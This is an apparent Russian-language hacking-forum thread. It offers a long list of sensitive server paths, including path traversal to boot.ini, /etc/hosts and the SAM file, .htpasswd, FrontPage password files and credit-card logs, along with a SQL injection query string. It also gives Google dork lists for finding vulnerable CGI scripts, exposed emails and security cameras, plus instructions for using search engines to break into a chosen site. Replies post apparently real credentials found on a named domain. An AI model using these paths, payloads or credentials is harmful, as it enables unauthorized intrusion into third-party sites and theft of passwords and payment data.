/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1

/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1

/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl

/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail

/cgibin/mailform.pl

/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords

/cgi-bin/shop/shopping350.mdb

/cgibin/cart/database/comersus.mdb

/dbase/date.

/www.gambling-01.co.uk/cgibin/password.txt

/cgibin/awstats.pl%3Flang%3Des

/ccbill/ccbill.log

/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords

/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde

/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit

/cgibin/index%20of

/cgi-bin/form1.cgi

/cc.txt

/cgibin/awstats.pl%3Flang%3Den%26update%3D1

/cg/./comersus/database/comersus.mdb

/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases

/cgibin /webshop/templates/cc.txt

/....../ all

/....../config.sys

/....../etc/hosts

/../../../../ all

/../../../../../../../boot.ini

/../../../../../winnt/repair/sam._

/../../../../config.sys

/../../../../etc/hosts

/.access

/.bash_history

/.htacc ess

/.html/............./config.sys

/.htpasswd

/.passwd

/ASPSamp/AdvWorks/equipment/catalog_type.asp

/Admin_files/order.log

/AdvWorks/equipment/catalog_type.asp

/Orders/order.log

/PDG_Cart/order.log

/PDG_Ca rt/shopper.conf

/PSUser/PSCOErrPage.htm

/WebShop/logs/cc.txt

/WebShop/logs/ck. log

/WebShop/templates/cc.txt

/_private

/_vti_bin/_vti_aut/dvwssr.dll

/_vti_bin /fpcount.exe

/_vti_inf.html

/_vti_pvt

/_vti_pvt/administrators.pwd

/_vti_pvt/authors.pwd

/_vti_pvt/service.pwd

/_vti_ pvt/shtml.dll

/_vti_pvt/shtml.exe

/_vti_pvt/users.pwd

/adsamples /config/site.csc

/bin

/carbo.dll

/ccbill/secure/ccbill.log

/cfdocs/cfmlsyntaxcheck.cfm

/---/docs/sourcewindow.cfm

/---/email/getfile.cfm?filename=c:\boot.ini

/---/displayopenedfile.cfm

/---/exprcalc.cfm

/---/openfile.cfm

/---/sendmail.cfm

/cfdocs/snippets/fileexists.cfm

/cfdocs/snippets/viewexample.cfm

/cgi

/cgi-bin

/cgi-bin/AT-admin.cgi

/cgi-bin/AT-generate.cgi

/cgi-bin/Admin_files/order.log

/cgi-bin/AnyForm2

/cgi-bin/Cgitest.exe

/cgi-bin/Count.cgi

/cgi-bin/FormHandler.cgi

/cgi-bin/GW5/GWWEB.EXE

/cgi-bin/UltraBoard.cgi

/cgi-bin /UltraBoard.pl

/cgi-bin/add_ftp.cgi

/cgi-bin/adp

/cgi-bin/adpassword.txt

/cgi-bin /ads.setup

/cgi-bin/aglimpse

/cgi-bin/alibaba.pl

/cgi-bin/allmanage.pl

/cgi-bin/allmanage/adp

/cgi-bin/allmanage/k

/cgi-bin/allmanage/settings.cfg

/cgi-bin/allmanage/userfile.dat

/cgi-bin/allmanageup.pl

/cgi-bin/anyboard.cgi

/cgi-bin/architext_query.pl

/cgi-bin/authorize/dbmfiles/users

/cgi-bin /ax-admin.cgi

/cgi-bin/ax.cgi

/cgi-bin/bigconf.cgi all

/cgi-bin/bizdb1-search.cgi

/cgi-bin/bnbform.cgi

/cgi-bin/cachemgr.cgi

/cgi-bin/calender.pl

/cgi-bin/calender_admin.pl

/cgi-bin/campas

/cgi-bin/cart.pl

/cgi-bin/cgiwrap

/cgi-bin /classifieds.cgi

/cgi-bin/clickresponder.pl

/cgi-bin/cmd.exe

/cgi-bin/counterfiglet

/cgi-bin/dbmlparser.exe

/cgi-bin/dig.cgi

/cgi-bin/dnewsweb

/cgi-bin/edit.pl

/cgi-bin/environ.cgi

/cgi-bin/excite

/cgi-bin/faxsurvey

/cgi-bin/filemail.pl

/cgi-bin /files.pl

/cgi-bin/finger

/cgi-bin/finger.pl

/cgi-bin/formmail.pl

/cgi-bin/fpcount.exe

/cgi-bin/fpexplore.exe

/cgi-bin/gH.cgi

/cgi-bin/get32.exe

/cgi-bin /glimpse

/cgi-bin/guestbook.cgi

/cgi-bin/handler

/cgi-bin/htimage.exe

/cgi-bin/htmlscript

/cgi-bin/htsearch

/cgi-bin /htsearch

/cgi-bin/iisadmpwd/achg.htr

/cgi-bin/iisadmpwd/aexp.htr

/cgi-bin /iisadmpwd/aexp2.htr

/cgi-bin/iisadmpwd/anot.htr

/cgi-bin/imagemap.exe

/cgi-bin/info2www

/cgi-bin/infosrch.cgi

/cgi-bin/input.bat

/cgi-bin/input2.bat

/cgi-bin/jj

/cgi-bin/k

/cgi-bin/loadpage.cgi

/cgi-bin /mailform.exe

/cgi-bin/maillist.pl

/cgi-bin/makechanges/easysteps/easysteps.pl

/cgi-bin/man.sh

/cgi-bin/netstat

/cgi-bin/nph-publish

/cgi-bin/nph-test-cgi

/cgi-bin/passwd

/cgi-bin/passwd.txt

/cgi-bin/perl.exe

/cgi-bin /perlshop.cgi

/cgi-bin/pfdispaly.cgi

/cgi-bin/pfdisplay

/cgi-bin /pfdisplay.cgi

/cgi-bin/phf

/cgi-bin/php.cgi

/cgi-bin/plusmail

/cgi-bin /postcard.pl

/cgi-bin/printenv

/cgi-bin/process_bug.cgi

/cgi-bin/query

/cgi-bin/responder

/cgi-bin/rguest.exe

/cgi-bin/rpm_query

/cgi-bin/rwwwshell.pl

/cgi-bin /search.cgi

/cgi-bin/settings.cfg

/cgi-bin/sojourn

/cgi-bin/survey.cgi

/cgi-bin/test-cgi

/cgi-bin/test.bat

/cgi-bin /textcounter.pl

/cgi-bin/tpgnrock

/cgi-bin/tst.bat

/cgi-bin/tst.bat

/cgi-bin/unlg1.1





--------------------------------------------------------------------------------



-==[Find Ftp Server]



inurl:"ftp." index.of





--------------------------------------------------------------------------------



-==[Using Google as a CGI Scanner]



inurl:cgi-bin/cgiemail/uargg.txt

inurl:random_banner/index.cgi

inurl:random_banner/index.cgi

inurl:cgi-bin/mailview.cgi

inurl:cgi-bin/maillist.cgi

inurl:cgi-bin/userreg.cgi

inurl:iissamples/ISSamples/SQLQHit.asp

inurl:iissamples/ISSamples/SQLQHit.asp

inurl:SiteServer/admin/findvserver.asp

inurl:scripts/cphost.dll

inurl:cgi-bin/finger.cgi





--------------------------------------------------------------------------------



-==[Awsome List for Rapidshare]



All rapidshare.de Downloads:

/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Arapidshare.de



Apps Rapidshare.de Downloads:

/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Arapidshare.de&btnG=Search



Movies rapidshare.de Downloads:

/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Arapidshare.de&btnG=Search





--------------------------------------------------------------------------------



-==[Find "Private" Emails...]



inurl:"/cgi-bin/email.txt"

inurl:"/emails.txt"





--------------------------------------------------------------------------------



-==[Find Security Cameras with Google]





inurl:"ViewerFrame?Mode="

intitle:"WJ-NT104 Main Page"

inurl:netw_tcp.shtml

intitle:"supervisioncam protocol"

Так же можно вставлять эти теги в поисковик если первый метод не сработал... Кстати бывает и такое что даже логин и пароль от админки храниться в не зашифрованном виде =))

Это действительно старо как мир... Но тем не менее... Самый простой способ взлома... Но если вам нужно взламать определённый сайт то набираем в гугле следующие site:sait.ru index +passwd например так...

Что же здесь написанно...
site - это адрес сайта нашей жертвы
index- это слово искомое на сайте
+ passwd- это слово будет искаться первее в гугле

И так это по сути простой поиск по сайту... И этот способ взлома называеться взлом через поисковик... Ну думаю суть вы поняли

Weffy · 02.02.2010, 02:17

На счет админки вот прога для ее поиска [Ссылки могут видеть только зарегистрированные пользователи. ]

**Nickitee** · 13.02.2010, 13:03

Это уже негде не работает, работает на бого забытых US сайтах.
А так норм, нашол 3 сайта тока у них пассы оч лёгкие asssder, newsssgamer, loloptt

wantedboy · 13.02.2010, 15:01

бойан)очень редко попадаются такие сайты

slavalist · 19.06.2010, 06:54

Попробовал набрать в гугл ни один сайт не нашел, ток такие же советы

ProTocoL · 19.06.2010, 11:41

Цитата:

Сообщение от slavalist


	Попробовал набрать в гугл ни один сайт не нашел, ток такие же советы

Также ненашло не один сайт

zuzzz · 19.06.2010, 12:47

находятся, вы наверно не правильно ищете.
вот сразуже нашел

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
matus:matus2007

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
admin:1 - но не лонится

world-wedding.ru/passwd.dat
world-wedding.ru/admin.php
admin:admin - но не лонится

только ****ь это всё. И в основном старьё. Не поможет это взломать, какой то определенный сайт.

И вообще, не в тему эта статья, тут читерский сайт или хакерский???

ReAct1[on] · 19.06.2010, 14:54

Цитата:

Сообщение от zuzzz


	находятся, вы наверно не правильно ищете. вот сразуже нашел [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] matus:matus2007 [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] admin:1 - но не лонится world-wedding.ru/passwd.dat world-wedding.ru/admin.php admin:admin - но не лонится только ****ь это всё. И в основном старьё. Не поможет это взломать, какой то определенный сайт. И вообще, не в тему эта статья, тут читерский сайт или хакерский???

Статья в тему ,так как она находится в разделе для этого...

Ломаем сайты попадавшиеся нам на встречу)))

Вопросы и ответы, обсуждения